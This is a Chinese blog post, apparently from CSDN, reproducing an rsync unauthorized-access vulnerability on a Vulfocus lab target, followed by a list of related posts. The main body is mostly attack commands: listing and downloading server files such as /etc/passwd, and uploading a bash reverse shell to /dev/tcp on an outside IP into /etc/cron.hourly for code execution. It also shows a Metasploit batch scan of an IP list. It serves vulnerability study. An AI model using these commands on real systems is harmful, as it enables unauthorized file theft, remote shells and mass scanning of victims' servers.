rsync 未授权访问漏洞

最新推荐文章于 2024-05-16 08:00:00 发布
最新推荐文章于 2024-05-16 08:00:00 发布
阅读量628 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45366453/article/details/125613855
版权
漏洞描述
产生原因
环境搭建
漏洞复现
漏洞发现

漏洞描述

rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口

产生原因

开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。

环境搭建

使用Vulfocus 漏洞威胁分析平台在线靶场测试:

在这里插入图片描述

漏洞复现

判断:rsync rsync://123.58.224.8:12018/
利用:
-读取文件:rsync rsync://123.58.224.8:12018/src/
-下载文件:rsync rsync://123.58.224.8:12018/src/etc/passwd ./
-上传文件:rsync -av passwd rsync://123.58.224.8:12018/src/tmp/passwd

利用定时任务反弹shell

  1. 获取信息

    rsync rsync://123.58.224.8:12018/src/etc/crontab /root/cron.txt

在这里插入图片描述

  1. .创建文件

    touch shell 
#!/bin/bash 
/bin/bash -i >& /dev/tcp/47.94.236.117/5566 0>&1
chmod +x shell

  2. 上传文件

    rsync -av shell rsync://123.58.224.8:12018/src/etc/cron.hourly  //创建一个同名文件来代替

在这里插入图片描述

  1. 等待接受反弹

漏洞发现

利用msf框架将想要测试的ip批量测试

msfconsole
use auxiliary/scanner/rsync/modules_list
set rhosts file:/root/ips.txt
set threads 10
run

参考链接

Vulhub - Docker-Compose file for vulnerability environment

4_Seasons
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞挖掘】——92、Rsync授权访问
Fly_鹏程万里
06-14 46
Rsync(Remote Sync)是一个用于文件和目录同步的开源工具,广泛用于Linux和Unix系统中,它通过比较源文件和目标文件的差异只传输变化的部分,实现高效的增量备份和文件同步,Rsync默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权就会触发隐患,Rsync的默认端口为837。
每日漏洞 | rsync授权访问
03-12 3809
每日漏洞 | rsync授权访问
rsync授权访问漏洞
Kevin's Blog
08-06 3177
文章目录一、漏洞介绍二、漏洞环境三、漏洞利用3.1 漏洞探测3.2 漏洞利用(下载任意文件)3.3 漏洞利用(提权、反弹shell)四、修复建议 一、漏洞介绍 二、漏洞环境 三、漏洞利用 3.1 漏洞探测 》》nmap扫描对方是否存在rsync服务,默认端口873,可能更改成了其它端口 》》列出目标服务器目录:(两个方法皆可) 》》查看目录中的文件,如能查看说明存在授权访问漏洞 或者 rsync rsync://<ip>:<port>/src 3.2 漏洞利用(下载任意文件
rsync授权访问漏洞利用复现
技术超强的网络安全平台
05-07 1165
一、Rsync简介Rsync是Linux下一款数据备份工具,它在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。同时支持通过rsync协议、ssh协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员。其中rsync协议默认监听873端口,而一般开发人员安全意识薄弱的情况下,如果目标开启了rsync服务,并且没有配置ACL或访问密码,而rsync默认是root权限,我们将可以读写目标服务器文件。二、利用条件rsync默认允许匿名访问,也可在其配置文件中为同
应用协议漏洞-Rsync+协议+漏洞批扫
xiaoheizi的博客
07-12 633
msfconsole是一个强大的接口程序。rsync rsync://123.58.224.8:20700/src/etc/crontab /root/cc.txt 查看crontab中的内容,发现有一个每17分钟执行一次/etc/cron.hourly文件的定时任务。命令:rsync -av shell rsync://123.58.224.8:22700/src/etc/cron.hourly。漏洞存在,可以读取文件:rsync rsync://123.58.224.8:58725/src/tmp/
授权访问Rsync 授权访问漏洞
最新发布
qq_68163788的博客
05-16 648
Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录。 Rsync 默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。Rsync 的默认端口为 837。
测试rsync授权访问漏洞及批量检测
m0_53073183的博客
01-31 710
rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件 传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配 置 ACL 或访问密码,我们将可以读写目标服务器文件。
rsync授权漏洞复现
weixin_45006525的博客
03-31 5756
漏洞简介: rsync是linux系统下的数据镜像备份工具,使用rsync可以快速增量备份数据,支持本地复制,或与其他ssh、rsync主机同步。该协议默认监听873端口,如果目标开启rsync,并且没有配置ACL或访问密码,就可以授权读写目标服务器文件。 环境搭建: 本此环境使用docker-vulhub 进入vulhub-rsync,运行docker-compose up -d 环境搭建完成后,用nmap扫描一下,发现服务已经启动 漏洞复现 1.列出模块下的文件 2.下载任意文件 rsync r
寻求帮助
weixin_34184158的博客
10-03 195
公司给他们配置的硬件防火墙是透明配置,只开启3389和9999端口。别的不需要配置。还有一点就是,他们分给我们一条可上网的网线,这条网线要连接到我们的防火墙上,要保证我们服务器可以上网,其中一条连接到他们华为24口不可配置的交换机上,保证其他办公室可以上网。问题是:在他们下班后做完配置,测试全部通过,但是一到早晨他们上班,网络就瘫痪了,我们不能上网,其他办公室也不能上网。...
【权限提升】Linux系统&Docker挂载&Rsync授权&Sudo-CVE&Polkit-CVE
今天是几号的博客
03-05 475
v将容器外部的目录/root(其他目录也可以) 挂载到容器内部/mnt,使用-it参数进入容器shell。如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等。管理员将真实物理机/root目录挂载到容器内部/mnt中,-it参数进入容器shell,补充:拿到普通用户权限后,并且该用户在docker中,意思就是可以控制docker服务。-复现:创建用户归类目录,添加到docker组。sudoedit -s / 报错 则存在。-利用:普通本地用户权限。
服务安全-应用协议rsync授权&ssh漏洞复现
rumil的博客
10-16 1370
libssh是一个在客户端和服务器端实现SSHv2协议的多平台C库。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配 置ACL或访问密码,我们将可以读写目标服务器文件。OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。表示在每小时的第17分钟执行run-parts --report /etc/cron.hourly命令。rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。
授权访问漏洞总结
LuckySec
03-24 4794
前言:这篇文章主要收集一些常见的授权访问漏洞授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 0x01 授权漏洞预览 Active MQ 授权访问 Atlassian Crowd 授权访问 CouchDB 授权访问 Docker 授权访问 Dubbo 授权访问 Druid 授权访问 Elasticsearch 授权访问 FTP 授权访问 Hadoop 授权访问 JBoss 授权访
漏洞复现-rsync-授权访问】vulfocus/rsync-common
10-16 1266
rsync-授权访问
Rsync授权访问 getshell——漏洞复现
W小哥
11-09 3673
一、 Rsync授权访问漏洞介绍 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 二、靶场搭建 靶机: ubuntu IP: 192.168.241.142 攻击机: kali IP: 192.168.241.128 直接使用 vluhub 环境了 cd rsync/common docker-compose build docke
Rsync授权访问
浅笑996的博客
11-19 5194
1.漏洞名称 Rsync 授权访问漏洞 2.漏洞原理 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或 访问密码,我们将可以读写目标服务器文件。 3.漏洞利用 vulhub环境靶机 : 192.168.91.130 攻击机:kali 192.168.91.128...
2024年网络安全最新敏感信息泄露总结_rabbitmq漏洞
2401_84302761的博客
05-01 830
漏洞原因:Elasticsearch是用Java开发的企业级搜索引擎,默认端口9200,存在授权访问漏洞时,可被非法操作数据概念:是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。定位:漏洞地址(授权访问的):典型命令复现方法:访问manage页面后点击脚本命令行写shell?>’);利用wget命令远程下载shellback.py并不需要root权限。
常见授权访问漏洞修复
qq_41945550的博客
06-02 4605
MongoDB是一个基于分布式文件存储的数据库,由C++语言编写,旨在为WEB应用提供可扩展的高性能数据存储解决方案。MongoDB默认端口为27017。开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。
rsync授权访问漏洞利用
weixin_47493074的博客
10-05 754
rsync授权访问漏洞利用

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值